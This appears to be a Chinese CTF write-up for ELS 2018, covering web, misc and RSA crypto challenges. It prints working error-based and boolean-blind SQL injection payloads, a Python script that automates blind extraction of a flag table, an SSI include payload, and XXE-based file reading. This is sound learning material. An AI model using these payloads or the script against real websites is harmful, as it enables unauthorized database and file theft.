ELS_2018_WriteUp

WEB

SimpleBBS

登录界面界面随手尝试输入单引号,引发了报错。

随即尝试报错注入

1
1' and (extractvalue(1,concat(0x7e,database(),0x7e)))#

成功爆出数据库,下面就是常规注入了

1
1' and (extractvalue(1,concat(0x7e,(select flag from flag limit 0,1),0x7e)))#

用substr函数截取,拿到完整flag。

1
1' and (extractvalue(1,concat(0x7e,(select substr(flag,20,40) from flag limit 0,1),0x7e)))#

SimpleServerInjection

hint:SimpleServerInjection, SSI, flag in current directory

SSI:服务器端包含攻击

https://www.secpulse.com/archives/66934.html

根据文章的payload :

1
<!--#include virtual="flag" -->

SimpleExtensionExplorerInjection

提示XXE, /flag。

直接尝试XXE进行读文件

需要改 content-type:application/xml

SimplePrintEventLogger

hint:same server as SimpleExtensionExploreInjection , RCE, flag in /

和上一题同样的环境,flag在根目录下。

还是用上题的payload

直接读到根目录,有个flagvvvvvaaaagegsgag2333文件

然后读flagvvvvvaaaagegsgag2333

(和RCE有什么关系?非预期了吗)

SimpleBlog

随便登录进去之后看到提示二次注入和文件包含。

经过一波尝试发现

注册一个 a’ 账户 ,无论怎么点题目都是0分。

但是注册一个 a’ # ,点题会有分数出现。可以构造bool盲注 。

1
1' and if(1,exp(999999999999),1)#

执行exp()函数会造成报错,会造成分数都为0。

1
1' and if(0,exp(999999999999),1)#

如果语句正常执行不报错,分数会正常显示。

这样就构成了bool盲注。

编写脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
# encoding=utf-8
import requests

def reg(name):
url="http://210.32.4.20/register.php"
data={
'username': name ,
'password': '123456'
}
r=requests.post(url=url,data=data)
return r.headers['Set-Cookie'][10:-8]

def log(name,cookie):
cookies = {
'PHPSESSID': cookie
}
url='http://210.32.4.20/login.php'
data = {
'username': name,
'password': '123456'
}
requests.post(url=url, data=data, cookies=cookies)
url = 'http://210.32.4.20/answer.php'
data = {
'1.a': 'on'
}
r = requests.post(url=url, data=data, cookies=cookies)
if 'Your grades is 0' in r.content:
return 1
else:
return 0
flag=''
for i in range(1,1000):
for j in (33,127):
payload = '''1' and if((ascii(substr((select flag from flag limit 0,1),%d,1))=%d),exp(999999999999),1)#'''%(i, j)
session = reg(payload)
if (log(payload,session)):
flag=flag+chr(j)
print flag
break

根据提示在flag表flag段中找到。

misc

gogogo

流量包追踪tcp流

保存照片得到flag。

checkin

验证码识别题

由于数量大并且有时间显示,考虑跑脚本来进⾏自动识别。首先需要写⼀一个training.py,收集验证码供人识别,产⽣一个训练集:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
import pwn

labels = dict()

labeled = 0
fails = 0
while labeled < 36:
isFailed = True
io = pwn.remote('210.32.4.14', 13373)
io.recvline()
io.recvline()
io.recvline()
lines = []
for i in range(10):
cur = io.recvline()
lines.append(cur)
for no in range(6):
cur = ''
for i in range(10):
for j in range(18 * no, 18 * (no + 1)):
cur += lines[i][j]
cur += '\n'
isLabeled = False
for value in labels.itervalues():
if cur == value:
isLabeled = True
if isLabeled:
break
print cur
ans = raw_input()
labels[ans[0]] = cur
labeled += 1
isFailed = False

if isFailed:
fails += 1
else:
fails = 0
if fails > 20:
break
print '%d pictures have been labeled. ' % labeled
io.close()

f = open('trainingset.txt', 'wt')
for key, value in labels.iteritems():
f.write(key)
f.write('=')
f.write(value.encode('hex'))
f.write('#\n')
f.close()

然后开始自动识别

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
import pwn

labels = dict()
f = open('trainingset.txt', 'rt')
flines = f.readlines()
for line in flines:
c = line[0]
label = line[2:-2].decode('hex')
labels[c] = label

io = pwn.remote('210.32.4.14', 13373)
io.recvline()
io.recvline()
io.recvline()

for _ in range(20):
lines = []
for i in range(10):
cur = io.recvline()
lines.append(cur)
ans = ''
for no in range(6):
cur = ''
for i in range(10):
for j in range(18 * no, 18 * (no + 1)):
cur += lines[i][j]
cur += '\n'
isLabeled = False
curChr = ''
for key, value in labels.iteritems():
if cur == value:
isLabeled = True
curChr = key
break
if not isLabeled:
print cur
curChr = raw_input()[0]
labels[curChr] = cur
f = open('trainingset.txt', 'at')
f.write(curChr)
f.write('=')
f.write(cur.encode('hex'))
f.write('#\n')
ans += curChr
io.recvuntil('your captcha: ')
io.sendline(ans)

print io.recvall()
io.close()

拿到flag

CRYPTO

AzureRSA

1
2
3
4
5
6
7
8
9
10
n1=0xcfc59d54b4b2e9ab1b5d90920ae88f430d39fee60d18dddbc623d15aae645e4e50db1c07a02d472b2eebb075a547618e1154a15b1657fbf66ed7e714d23ac70bdfba4c809bbb1e27687163cb09258a07ab2533568192e29a3b8e31a5de886050b28b3ed58e81952487714dd7ae012708db30eaf007620cdeb34f150836a4b723L
e1=0xfae3aL
c1=0x81523a330fb15125b6184e4461dadac7601340960840c5213b67a788c84aecfcdc3caf0bf3e27e4c95bb3c154db7055376981972b1565c22c100c47f3fa1dd2994e56090067b4e66f1c3905f9f780145cdf8d0fea88a45bae5113da37c8879c9cdb8ee9a55892bac3bae11fbbabcba0626163d0e2e12c04d99f4eeba5071cbeaL
n2=0xd45304b186dc82e40bd387afc831c32a4c7ba514a64ae051b62f483f27951065a6a04a030d285bdc1cb457b24c2f8701f574094d46d8de37b5a6d55356d1d368b89e16fa71b6603bd037c7f329a3096ce903937bb0c4f112a678c88fd5d84016f745b8281aea8fd5bcc28b68c293e4ef4a62a62e478a8b6cd46f3da73fa34c63L
e2=0x1f9eaeL
c2=0x4d7ceaadf5e662ab2e0149a8d18a4777b4cd4a7712ab825cf913206c325e6abb88954ebc37b2bda19aed16c5938ac43f43966e96a86913129e38c853ecd4ebc89e806f823ffb802e3ddef0ac6c5ba078d3983393a91cd7a1b59660d47d2045c03ff529c341f3ed994235a68c57f8195f75d61fc8cac37e936d9a6b75c4bd2347L
assert pow(flag,e1,n1)==c1
assert pow(flag,e2,n2)==c2
assert gcd(e1,(p1-1)*(q1-1))==14
assert gcd(e2,(p2-1)*(q2-1))==14

解密脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
import gmpy2
from libnum import *
n1=0xcfc59d54b4b2e9ab1b5d90920ae88f430d39fee60d18dddbc623d15aae645e4e50db1c07a02d472b2eebb075a547618e1154a15b1657fbf66ed7e714d23ac70bdfba4c809bbb1e27687163cb09258a07ab2533568192e29a3b8e31a5de886050b28b3ed58e81952487714dd7ae012708db30eaf007620cdeb34f150836a4b723L
e1=0xfae3aL
c1=0x81523a330fb15125b6184e4461dadac7601340960840c5213b67a788c84aecfcdc3caf0bf3e27e4c95bb3c154db7055376981972b1565c22c100c47f3fa1dd2994e56090067b4e66f1c3905f9f780145cdf8d0fea88a45bae5113da37c8879c9cdb8ee9a55892bac3bae11fbbabcba0626163d0e2e12c04d99f4eeba5071cbeaL
n2=0xd45304b186dc82e40bd387afc831c32a4c7ba514a64ae051b62f483f27951065a6a04a030d285bdc1cb457b24c2f8701f574094d46d8de37b5a6d55356d1d368b89e16fa71b6603bd037c7f329a3096ce903937bb0c4f112a678c88fd5d84016f745b8281aea8fd5bcc28b68c293e4ef4a62a62e478a8b6cd46f3da73fa34c63L
e2=0x1f9eaeL
c2=0x4d7ceaadf5e662ab2e0149a8d18a4777b4cd4a7712ab825cf913206c325e6abb88954ebc37b2bda19aed16c5938ac43f43966e96a86913129e38c853ecd4ebc89e806f823ffb802e3ddef0ac6c5ba078d3983393a91cd7a1b59660d47d2045c03ff529c341f3ed994235a68c57f8195f75d61fc8cac37e936d9a6b75c4bd2347L
p=gcd(n1,n2)
q1=n1/p
q2=n2/p
assert(p*q1==n1)
assert(p*q2==n2)
f1=(p-1)*(q1-1)
f2=(p-1)*(q2-1)
tmp=gcd(e1,e2)
e1=e1/tmp
e2=e2/tmp
d1=invmod(e1,f1)
d2=invmod(e2,f2)
m1=pow(c1,d1,n1)
m2=pow(c2,d2,n2)
m3=m1%p
m2=m2%q2
m1=m1%q1
m=solve_crt([m1,m2,m3], [q1,q2,p])
print m
n=q1*q2
f=(q1-1)*(q2-1)
m=m%n
d=invmod(7,f)
m=pow(m,d,n)
print n2s(gmpy2.iroot(m, 2)[0])